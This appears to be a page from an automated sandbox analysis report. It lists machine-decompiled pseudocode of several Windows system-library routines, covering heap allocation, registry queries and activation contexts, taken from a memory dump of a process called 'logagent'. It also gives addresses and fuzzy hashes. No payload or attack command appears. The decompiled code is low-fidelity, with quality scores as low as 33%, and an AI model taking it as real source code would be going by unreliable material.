						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E051F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E051F95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x452d801a
							_t109 = L051D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2003452d
								E051FF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2003452d
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E051F95D0();
										L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                              0x051ef0d3
                                              0x051ef0d9
                                              0x051ef0e0
                                              0x051ef0e7
                                              0x051ef0f2
                                              0x051ef0f4
                                              0x051ef0f8
                                              0x051ef100
                                              0x051ef108
                                              0x051ef10d
                                              0x051ef115
                                              0x051ef116
                                              0x051ef11f
                                              0x051ef123
                                              0x051ef124
                                              0x051ef12c
                                              0x051ef130
                                              0x051ef134
                                              0x051ef13d
                                              0x051ef144
                                              0x051ef14b
                                              0x051ef152
                                              0x0522bab0
                                              0x0522bab0
                                              0x051ef158
                                              0x051ef158
                                              0x051ef15a
                                              0x051ef160
                                              0x051ef165
                                              0x051ef166
                                              0x051ef16f
                                              0x051ef173
                                              0x0522baa7
                                              0x0522baa7
                                              0x0522baab
                                              0x00000000
                                              0x051ef179
                                              0x051ef179
                                              0x051ef18d
                                              0x051ef191
                                              0x0522baa2
                                              0x00000000
                                              0x051ef197
                                              0x051ef19b
                                              0x051ef1a2
                                              0x051ef1a9
                                              0x051ef1af
                                              0x051ef1b2
                                              0x051ef1b6
                                              0x051ef1b9
                                              0x051ef1c0
                                              0x051ef1c4
                                              0x051ef1d8
                                              0x051ef1df
                                              0x051ef1e3
                                              0x051ef1e6
                                              0x051ef1eb
                                              0x051ef1ee
                                              0x051ef1f4
                                              0x051ef20f
                                              0x0522bab7
                                              0x0522babb
                                              0x0522bacc
                                              0x0522bad1
                                              0x051ef215
                                              0x051ef218
                                              0x051ef226
                                              0x051ef22b
                                              0x00000000
                                              0x051ef22b
                                              0x051ef1f6
                                              0x051ef1f6
                                              0x051ef1f9
                                              0x051ef1fb
                                              0x051ef1fb
                                              0x051ef1f4
                                              0x051ef191
                                              0x051ef173
                                              0x051ef152
                                              0x051ef203

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction ID: b61ef4c5be10aa49a93c9cdc9395b54dd7622630661b1631e12f3ca0861c18fa
                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction Fuzzy Hash: DF517C72604715AFC321DF19C840A6BB7F9FF48710F00892EFA95876A0E7B4E945CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05233540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E05233540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x52ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E051F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05233706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E051FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05233540;
						E051FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0520DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05240C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E051F97C0();
					}
					return E051FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05233971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05233884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E051FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E051F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05233787(_a4,  &_v352, _t80);
						}
					}
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E051F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                              0x05233552
                                              0x0523355a
                                              0x0523355d
                                              0x05233566
                                              0x05233567
                                              0x0523357e
                                              0x0523358f
                                              0x052335a1
                                              0x052335a5
                                              0x0523366b
                                              0x0523366b
                                              0x0523366d
                                              0x05233672
                                              0x05233679
                                              0x05233685
                                              0x0523368d
                                              0x0523369d
                                              0x052336a7
                                              0x052336b8
                                              0x052336c6
                                              0x052336c7
                                              0x052336dc
                                              0x052336e1
                                              0x052336e7
                                              0x052336e9
                                              0x052336e9
                                              0x05233703
                                              0x05233703
                                              0x052335b5
                                              0x052335c0
                                              0x052335c4
                                              0x00000000
                                              0x00000000
                                              0x052335ca
                                              0x052335d7
                                              0x052335e2
                                              0x052335e6
                                              0x052335e8
                                              0x052335f5
                                              0x052335fa
                                              0x05233603
                                              0x05233604
                                              0x05233609
                                              0x0523360a
                                              0x05233612
                                              0x05233613
                                              0x0523361e
                                              0x05233622
                                              0x05233628
                                              0x0523362f
                                              0x0523362f
                                              0x05233636
                                              0x05233638
                                              0x0523363b
                                              0x05233642
                                              0x05233642
                                              0x05233636
                                              0x05233657
                                              0x05233657
                                              0x0523365c
                                              0x05233662
                                              0x05233669
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: 43bda9e10ccf4580049fced04131f755d349452486468f712edd8be4d42d46b5
                                              • Instruction ID: 1c17da5291cf5712d63a6a5570a7176389d0c9b0f8ff3e593331998e22b3c2db
                                              • Opcode Fuzzy Hash: 43bda9e10ccf4580049fced04131f755d349452486468f712edd8be4d42d46b5
                                              • Instruction Fuzzy Hash: F24134F291052D9FDB21DA50CC85FAEB77CAF44714F0045A5E609AB241DB709F89CFA8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052805AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E052805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E052807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E051F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0527A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0527A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05281293(_t79, _v40, E052807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E051D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0527138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                              0x052805c5
                                              0x052805ca
                                              0x052805d3
                                              0x052806db
                                              0x052806db
                                              0x052806dd
                                              0x052806e3
                                              0x052806e3
                                              0x052805dd
                                              0x052805e7
                                              0x052805f6
                                              0x05280600
                                              0x05280607
                                              0x05280610
                                              0x05280615
                                              0x0528061a
                                              0x0528061c
                                              0x0528061e
                                              0x05280624
                                              0x05280625
                                              0x05280627
                                              0x05280628
                                              0x05280631
                                              0x05280640
                                              0x0528064d
                                              0x05280654
                                              0x05280654
                                              0x05280631
                                              0x0528066d
                                              0x05280674
                                              0x00000000
                                              0x00000000
                                              0x05280692
                                              0x0528069e
                                              0x052806b0
                                              0x052806a0
                                              0x052806a9
                                              0x052806a9
                                              0x052806b8
                                              0x052806d6
                                              0x052806d6
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction ID: a0cde61f58beba3845179a0c8a54b83407285c20af260bae238026a8ee2dfda3
                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction Fuzzy Hash: 903102323147166BE720EE66CC49FAB7799FF84754F044228FA599B2C0D770E908CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05233884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E05233884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E051F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L051D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E051F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                              0x05233893
                                              0x05233896
                                              0x05233899
                                              0x0523389f
                                              0x052338a0
                                              0x052338a4
                                              0x052338a9
                                              0x052338ac
                                              0x052338ad
                                              0x052338ae
                                              0x052338af
                                              0x052338b1
                                              0x052338b4
                                              0x052338bb
                                              0x052338bc
                                              0x052338bd
                                              0x052338c4
                                              0x052338c8
                                              0x052338ca
                                              0x052338ca
                                              0x052338d5
                                              0x0523393e
                                              0x05233940
                                              0x05233942
                                              0x05233952
                                              0x05233954
                                              0x05233961
                                              0x05233961
                                              0x05233967
                                              0x0523396e
                                              0x0523396e
                                              0x05233947
                                              0x0523394c
                                              0x00000000
                                              0x0523394c
                                              0x052338ea
                                              0x052338ee
                                              0x052338f8
                                              0x052338f9
                                              0x052338ff
                                              0x05233900
                                              0x05233902
                                              0x05233903
                                              0x0523390b
                                              0x0523390f
                                              0x05233950
                                              0x00000000
                                              0x05233950
                                              0x05233915
                                              0x0523391d
                                              0x0523391d
                                              0x05233922
                                              0x05233926
                                              0x00000000
                                              0x05233928
                                              0x0523392b
                                              0x0523392b
                                              0x05233935
                                              0x05233937
                                              0x05233937
                                              0x00000000
                                              0x05233935
                                              0x05233926
                                              0x052338f0
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryName
                                              • API String ID: 0-215506332
                                              • Opcode ID: 3f64da328f4a4c2f8451a8d2191f0cfc981886f3a90d54c334ada55a1bf6cc49
                                              • Instruction ID: 368de6f54f61c28f488e68a6a73a17aa1589e6916b13f6157b5e46c7912106ee
                                              • Opcode Fuzzy Hash: 3f64da328f4a4c2f8451a8d2191f0cfc981886f3a90d54c334ada55a1bf6cc49
                                              • Instruction Fuzzy Hash: 1D3105B2E1550AEFEB15DA58C986E7BF775FF90720F014529E909A7250E7309F00C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051ED294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 33%
                                              			E051ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x52ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E051D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E051FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E051F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E051F95D0();
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                              0x051ed29c
                                              0x051ed2a6
                                              0x051ed2b1
                                              0x051ed2b5
                                              0x051ed2b6
                                              0x051ed2bc
                                              0x051ed2bd
                                              0x051ed2be
                                              0x051ed2bf
                                              0x051ed2c2
                                              0x051ed2c4
                                              0x051ed2cc
                                              0x051ed384
                                              0x051ed34b
                                              0x051ed34f
                                              0x051ed350
                                              0x051ed351
                                              0x051ed35c
                                              0x051ed35c
                                              0x051ed2d6
                                              0x051ed2da
                                              0x051ed2e1
                                              0x051ed361
                                              0x051ed369
                                              0x051ed36d
                                              0x051ed2e3
                                              0x051ed2e3
                                              0x051ed2e3
                                              0x051ed2e5
                                              0x051ed2ed
                                              0x051ed2f5
                                              0x051ed2fa
                                              0x051ed302
                                              0x051ed303
                                              0x051ed30b
                                              0x051ed30f
                                              0x051ed313
                                              0x051ed318
                                              0x051ed31c
                                              0x051ed320
                                              0x051ed379
                                              0x051ed37d
                                              0x00000000
                                              0x00000000
                                              0x0522affe
                                              0x0522b001
                                              0x0522b011
                                              0x00000000
                                              0x051ed322
                                              0x051ed322
                                              0x051ed330
                                              0x051ed337
                                              0x051ed35d
                                              0x051ed339
                                              0x051ed33f
                                              0x051ed38c
                                              0x051ed38c
                                              0x051ed33f
                                              0x051ed349
                                              0x00000000
                                              0x051ed349

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 34701e7c2584c20e8e4004a736321101b8fa7db1469c78d4186994221e086739
                                              • Instruction ID: 83f5458efd634e41dfbb23376154c4798b9169e2d2719dc9573d6962efd721c5
                                              • Opcode Fuzzy Hash: 34701e7c2584c20e8e4004a736321101b8fa7db1469c78d4186994221e086739
                                              • Instruction Fuzzy Hash: 9031B1B66087059FC321DF28E985E6BFBE9FB85654F01092EF99583250D734DD04CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E051C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E051FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E051FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E051FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L051D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                              0x051c1b8f
                                              0x051c1b9a
                                              0x051c1b9c
                                              0x051c1b9e
                                              0x051c1ba3
                                              0x05217010
                                              0x05217010
                                              0x00000000
                                              0x051c1ba9
                                              0x051c1ba9
                                              0x051c1bae
                                              0x00000000
                                              0x051c1bc5
                                              0x051c1bca
                                              0x051c1bcf
                                              0x051c1bd0
                                              0x051c1bd1
                                              0x051c1bd2
                                              0x051c1bd6
                                              0x051c1bdc
                                              0x051c1be0
                                              0x05216ffc
                                              0x05217000
                                              0x00000000
                                              0x05217006
                                              0x05217009
                                              0x05217009
                                              0x051c1be6
                                              0x051c1bec
                                              0x051c1c0b
                                              0x051c1c0b
                                              0x051c1c0c
                                              0x051c1c11
                                              0x051c1c12
                                              0x051c1c15
                                              0x051c1c1b
                                              0x051c1c1f
                                              0x051c1c31
                                              0x051c1c33
                                              0x05217026
                                              0x05217026
                                              0x051c1c21
                                              0x051c1c24
                                              0x051c1c24
                                              0x051c1bee
                                              0x051c1bee
                                              0x051c1bf2
                                              0x051c1c3a
                                              0x051c1bf4
                                              0x051c1bf4
                                              0x051c1c05
                                              0x051c1c05
                                              0x051c1c09
                                              0x051c1c3e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051c1c09
                                              0x051c1bec
                                              0x051c1be0
                                              0x051c1bae
                                              0x051c1c2e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290
                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction ID: e200af528eb42f463a77655d1fedc94fe0b957b40bfe91446a4160ee910c64fc
                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction Fuzzy Hash: D321FB77684214BBCB21DA55C844FAFBBADFFA1A50F0A4869FD098B201D735DD01C7A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051DF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                              0x051df71d
                                              0x051df722
                                              0x051df726
                                              0x05224770
                                              0x051df765
                                              0x051df769
                                              0x051df769
                                              0x051df732
                                              0x0522477a
                                              0x00000000
                                              0x0522477a
                                              0x051df738
                                              0x051df73a
                                              0x051df73c
                                              0x051df73f
                                              0x051df746
                                              0x051df778
                                              0x051df7a9
                                              0x051df7a9
                                              0x051df754
                                              0x051df75a
                                              0x051df75d
                                              0x051df75f
                                              0x051df761
                                              0x051df76f
                                              0x051df771
                                              0x051df771
                                              0x051df76f
                                              0x051df763
                                              0x00000000
                                              0x051df763
                                              0x051df77d
                                              0x051df7a3
                                              0x051df7a5
                                              0x00000000
                                              0x051df7a5
                                              0x051df77f
                                              0x051df782
                                              0x051df784
                                              0x051df786
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051df788
                                              0x051df748
                                              0x051df74d
                                              0x051df78d
                                              0x051df793
                                              0x051df7b7
                                              0x051df7bc
                                              0x00000000
                                              0x051df7bc
                                              0x051df798
                                              0x00000000
                                              0x00000000
                                              0x051df79d
                                              0x051df7b0
                                              0x00000000
                                              0x051df7b0
                                              0x051df79f
                                              0x00000000
                                              0x051df74f
